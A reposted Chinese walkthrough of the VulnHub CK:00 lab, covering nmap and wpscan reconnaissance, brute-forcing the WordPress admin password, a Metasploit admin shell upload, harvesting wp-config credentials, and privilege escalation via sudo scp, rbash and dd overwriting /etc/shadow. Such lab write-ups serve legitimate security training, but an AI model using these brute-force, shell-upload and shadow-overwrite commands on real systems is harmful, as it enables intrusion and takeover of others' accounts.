欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 创投人物 > VulnHub:CK00

VulnHub:CK00

2024/11/30 8:47:54 来源:https://blog.csdn.net/Aukum/article/details/140420506  浏览:    关键词:VulnHub:CK00

靶场搭建

靶机下载地址:CK: 00 ~ VulnHub

下载后,在vmware中打开靶机。

  1. 修改网络配置为NAT

  2. 处理器修改为2

  3. 启动靶机

靶机ip扫描不到的解决办法

  1. 靶机开机时一直按shift或者esc直到进入GRUB界面。

  2. 按e进入编辑模式,找到ro,修改为如下内容。ctrl+x重启服务。

    rw signie init=/bin/bash quiet
  3. 进入如下页面。如果没有进入说明第二步修改错误,重新执行1,2步。                                  

  4. ip a查看网卡信息。这里网卡是ens33。                                                                                  

  5. 打开网卡配置文件vi /etc/netplan/50-cloud-init.yaml。                                                    

    发现网卡名称不一致,按i修改为以下内容。增加的内容主要是为了将ens33网卡ip配置成攻击机同网段。                                    

    • addresses: [ip/24]

    • gateway4: 网关

    • nameservers: addresses: [dns]

  6. netplan apply生效,再重启靶机即可修改成功。

如果上述步骤仍然不行,在步骤5前增加一步:apt install ifupdown resolvconf

信息收集

主机发现

nmap 192.168.233.0/24 -sP -T4

靶机ip为:192.168.233.121。

端口扫描

nmap 192.168.233.121 -A -T4

开放22,80端口。

目录扫描and网站指纹

首先看看80端口网站首页。最重要的信息是WordPress。

网站指纹扫描确认一下。

whatweb http://192.168.233.121

该网站的确由WordPress搭建。继续目录扫描。

dirsearch -u http://192.168.233.121

根据扫描结果,发现有重定向到ck这个域名的情况,直接访问报错报错,因此需要修改一下hosts文件,vim /etc/hosts,增加一条主机名和IP地址的映射关系:

192.168.233.121  ck

访问/wp-login.php。需要用户密码,用wpscan进行枚举。

访问/wp-includes。没找到名字和内容敏感的文件。

wpscan

根据前面的信息收集,80端口的网站由WordPress搭建,我们使用wpscan(WordPress扫描工具)扫描,目的是枚举用户和密码。

# 枚举用户,插件,主题
wpscan --url http://192.168.233.121 --enumerate u,p,t

根据扫描结果,发现存在admin用户。接下来使用wpscan爆破密码。

wpscan --url http://192.168.233.121 --passwords 字典路径 --usernames admin --max-threads 100

密码是admin。成功登入wordpress后台。

2、漏洞利用

已知WordPress用户名和密码,打开msf,使用unix/webapp/wp_admin_shell_upload模块。

msfconsole
search wp_admin
use 0
options
set rhosts 192.168.233.121
set password admin
set username admin
run

成功拿到meterpreter,看到当前权限不高。进入shell模式,进行信息收集。

shell
# 显示用户名和路径(可以不执行这一步)
python3 -c 'import pty;pty.spawn("/bin/bash")'

切换到home目录,发现存在ck,bla,bla1三个用户。在/home/ck路径下发现第一个flag。

在wp-config.php中找到数据库用户名和密码。cat /var/www/html/wp-config.php

3、提权

得到的密码尝试确认是bla用户的密码。

sudo -l想办法提权。可用利用scp命令拿到bla1的shell。

scp提权

搜一下scp如何提权。百度告诉我们执行以下四步即可提权。

做一下修改,因为是切换到bla1所以命令应该是:sudo -u bla1 scp -S $TF x y:。命令执行后报错Can't open /tmp/tmp.kPOFihNHbV,chmod将这个文件的权限修改为777即可。

rbash

继续提权sudo -l

提示我们利用/bin/rbash拿到ck-00的shell,无密码。rbash是什么,rbash是受限制的 bash,这里可以就当作是/bin/bash使用,直接切换到ck-00。

sudo -u ck-00 /bin/rbash

sudo -l。提示我们通过dd提权到root权限。

dd提权

dd命令是用于读取、转换、输出数据的,dd提权主要是利用对数据的转换来实现的,比如:替换root用户密码hash值从而修改密码达到提权的目的。

在攻击机上生成明文密码的hash。使用mkpasswd生成sha-512加密算法的hash。

# -m 指定加密方式
mkpasswd -m sha-512 123456

参照kali中shadow文件root用户的用户信息,将第二个参数密码的hash值替换成刚刚生成的hash值并保存起来备用。

cat /etc/shadow
# 将结果复制出来,替换一下root用户的hash值
root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::

到靶机中,将etc/shadow替换为刚刚备好的内容。

echo 'root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::' | sudo dd of=/etc/shadow

执行完毕后,切换到root用户,输入我们设置的密码即可。

get root flag🎆

总结

这里推荐一个网站GTFOBins,用于找提权利用方式的网站。

例如:需要利用dd命令提权,访问该网站,输入dd。

点开后会显示利用方法。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com